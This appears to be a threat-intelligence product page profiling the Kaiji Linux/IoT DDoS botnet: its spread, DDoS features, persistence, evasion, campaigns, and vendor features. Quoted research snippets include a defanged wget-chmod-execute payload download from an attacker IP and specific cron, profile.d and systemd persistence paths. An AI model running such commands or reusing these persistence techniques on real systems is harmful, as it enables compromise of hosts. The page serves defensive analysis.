Kaiji is a Go-based DDoS botnet targeting Linux servers and IoT devices. It uses a custom implant developed independently of Mirai and BillGates code. Early versions propagated by brute-forcing exposed SSH root accounts; root privileges enabled attacks requiring custom network packets. Subsequent activity targeted unauthenticated Docker APIs, deploying malicious containers that downloaded and executed Kaiji. Other observed distribution chains exploited vulnerabilities including CVE-2024-7954, CVE-2023-1389, and CVE-2025-55182 (React2Shell), often using shell-script stagers to retrieve architecture-specific payloads.
Kaiji supports TCP and UDP floods, SYN, SYN-ACK and ACK attacks, and IP-spoofing attacks. Its command-and-control interface also supports SSH brute forcing, arbitrary shell-command execution, replacement of command servers, and self-deletion with persistence removal. The malware collects host and network information and attempts lateral movement using existing SSH keys and host addresses recovered from shell history. Later Ares builds additionally support WebSocket attacks and deployment of XMRig.
Kaiji establishes redundant persistence through systemd and SysVinit services, cron jobs, shell startup configuration, and modifications to SSH startup behavior. Defense-evasion techniques include masquerading as system utilities, relocating binaries, using bind mounts, and altering SELinux enforcement. Command-and-control configuration can be encoded or encrypted, depending on the variant.
Kaiji has been deployed in the REF6138 Linux-server intrusion campaign alongside separate cryptomining payloads and covert-access tools. It has also appeared in React2Shell exploitation campaigns affecting Russian organizations in insurance, e-commerce, and IT. No named operator is firmly established.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
4 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Via our honeypots, we also observed Kaiji spreading through vulnerability exploitation, notably targeting CVE‑2024‑7954 and CVE‑2023‑1389.
Via our honeypots, we also observed Kaiji spreading through vulnerability exploitation, notably targeting CVE‑2024‑7954 and CVE‑2023‑1389.
React2Shell in Russia: ... In some cases, the final payloads were the Kaiji and Rustobot botnets...
Santander’s security research team claims this threat actor is targeting security researchers by hiding a malicious backdoor in CVE-2024-6387 proof-of-concept code, and when running the PoC it will lead to infection of the server with Kaiji malware.
30 distinct techniques documented for this family, organized by ATT&CK tactic.
GSOCKET sets up a cron job that runs its binary with the secret key every minute; KAIJI also alters /etc/crontab to execute /.img as root on a schedule.
wget hxxp://122[.]51[.]133[.]49:10086/VIP –O VIP chmod 777 VIP ./VIP
The attacker used the www-data account to download a script named 00.sh; subsequent payloads were executed with sh -c, wget, chmod, and bash.
main_runghost: Install persistence through /etc/profile.d (/etc/profile.d/linux.sh)
GSOCKET sets up a cron job that runs its binary with the secret key every minute; KAIJI also alters /etc/crontab to execute /.img as root on a schedule.
The Apache backdoor became active again, and gk.php and 404.php PHP payloads were fetched for likely future access.
main_runkshell: Install persistence through rc.d and Systemd services: Systemd (/etc/systemd/system/linux.service)
The detection rule flags suspicious shell configuration-file creation, "aligning with tactics like persistence and event-triggered execution."
main_runghost: Install persistence through /etc/profile.d (/etc/profile.d/linux.sh)
GSOCKET sets up a cron job that runs its binary with the secret key every minute; KAIJI also alters /etc/crontab to execute /.img as root on a schedule.
main_runkshell: Install persistence through rc.d and Systemd services: Systemd (/etc/systemd/system/linux.service)
some of the C2 addresses are decrypted through a chain of three encryption schemes, while another C2 address is simply encoded in base64
A /usr/bin/lib directory is created and then Kaiji is installed under the filename ‘netstat’, ‘ps’, ‘ls’, or some other system tool name.
Afterwards, the script also removed other Linux binaries that are basic components of the operating system but are not necessary for its DDoS operation.
In late April we identified a new botnet campaign with definitive Chinese origins, targeting servers and IoT devices via SSH brute forcing.
whatserver.sh gathers server details including currently listening services, while malware installs and interacts with Systemd and SysVinit services.
The XORDDoS infection started with the attackers searching for hosts with exposed Docker API ports (2375).
74 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
37 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A MIPS-based IoT malware family included as one of seven balanced malware-family classes in the proof-of-concept EMBeD benchmark dataset.
A MIPS-based IoT malware family included in the EMBeD proof-of-concept benchmark dataset.
Referenced as the likely predecessor or code ancestor of Chaos, with inherited botnet functionality later reworked or removed.
Go-based botnet targeting Linux and IoT devices, with DDoS and reverse-shell capabilities. Originally spread through SSH brute-force attacks against exposed root accounts; the researchers also observed propagation through vulnerability exploitation. The analysed sample stores its C2 address and port in a Base64-encoded string preceded by the marker "use ParseCertificate". The extractor decodes this string and splits it at "|(odk)/*-" to retrieve the C2 configuration.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.